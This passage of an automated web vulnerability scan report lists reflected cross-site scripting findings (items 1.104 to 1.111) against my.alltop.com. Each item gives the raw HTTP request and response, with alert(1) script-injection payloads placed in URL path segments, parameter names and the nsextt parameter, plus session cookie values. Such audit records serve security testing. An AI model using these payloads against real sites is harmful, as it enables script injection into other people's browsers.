User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:54 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:55 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:55 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/f40afb"><script>alert(1)</script>655b90c610e" method="post" accept-charset="utf-8">
...[SNIP]...

1.104. http://my.alltop.com/alpha/f [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/f

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f0ef"><script>alert(1)</script>d47ef86f40c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/f?5f0ef"><script>alert(1)</script>d47ef86f40c=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:51 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:53 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:53 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/f?5f0ef"><script>alert(1)</script>d47ef86f40c=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.105. http://my.alltop.com/alpha/f [nsextt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/f

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ec7e"><script>alert(1)</script>3019f0a8426 was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/f?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00012B)%3C/script%3E3ec7e"><script>alert(1)</script>3019f0a8426 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:51 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:51 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:51 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/f?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00012B)%3C/script%3E3ec7e"><script>alert(1)</script>3019f0a8426" method="post" accept-charset="utf-8">
...[SNIP]...

1.106. http://my.alltop.com/alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c1b4"><script>alert(1)</script>b16ac6f5f69 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/f'%22--%3E%3C2c1b4"><script>alert(1)</script>b16ac6f5f69/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:44 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:45 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:45 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/f'%22--%3E%3C2c1b4"><script>alert(1)</script>b16ac6f5f69/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.107. http://my.alltop.com/alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23e18"><script>alert(1)</script>7ac76a0e2a1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/f'%22--%3E%3C/style%3E%3C23e18"><script>alert(1)</script>7ac76a0e2a1/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:45 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:45 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:45 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/f'%22--%3E%3C/style%3E%3C23e18"><script>alert(1)</script>7ac76a0e2a1/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.108. http://my.alltop.com/alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea335"><script>alert(1)</script>051bda2056f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3Cea335"><script>alert(1)</script>051bda2056f/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:48 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:51 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:51 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3Cea335"><script>alert(1)</script>051bda2056f/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.109. http://my.alltop.com/alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13727"><script>alert(1)</script>cff66e8d38d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E13727"><script>alert(1)</script>cff66e8d38d HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:53 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:00 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:00 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E13727"><script>alert(1)</script>cff66e8d38d" method="post" accept-charset="utf-8">
...[SNIP]...

1.110. http://my.alltop.com/alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39f18"><script>alert(1)</script>9d2ef1fc101 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E?39f18"><script>alert(1)</script>9d2ef1fc101=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:42 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:43 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:43 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/f'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AD)%3C/script%3E?39f18"><script>alert(1)</script>9d2ef1fc101=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.111. http://my.alltop.com/alpha/f/%22ns=%22netsparker(0x0001AE) [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/f/%22ns=%22netsparker(0x0001AE)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dffd"><script>alert(1)</script>494432b1804 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/f1dffd"><script>alert(1)</script>494432b1804/%22ns=%22netsparker(0x0001AE) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:34 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:35 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
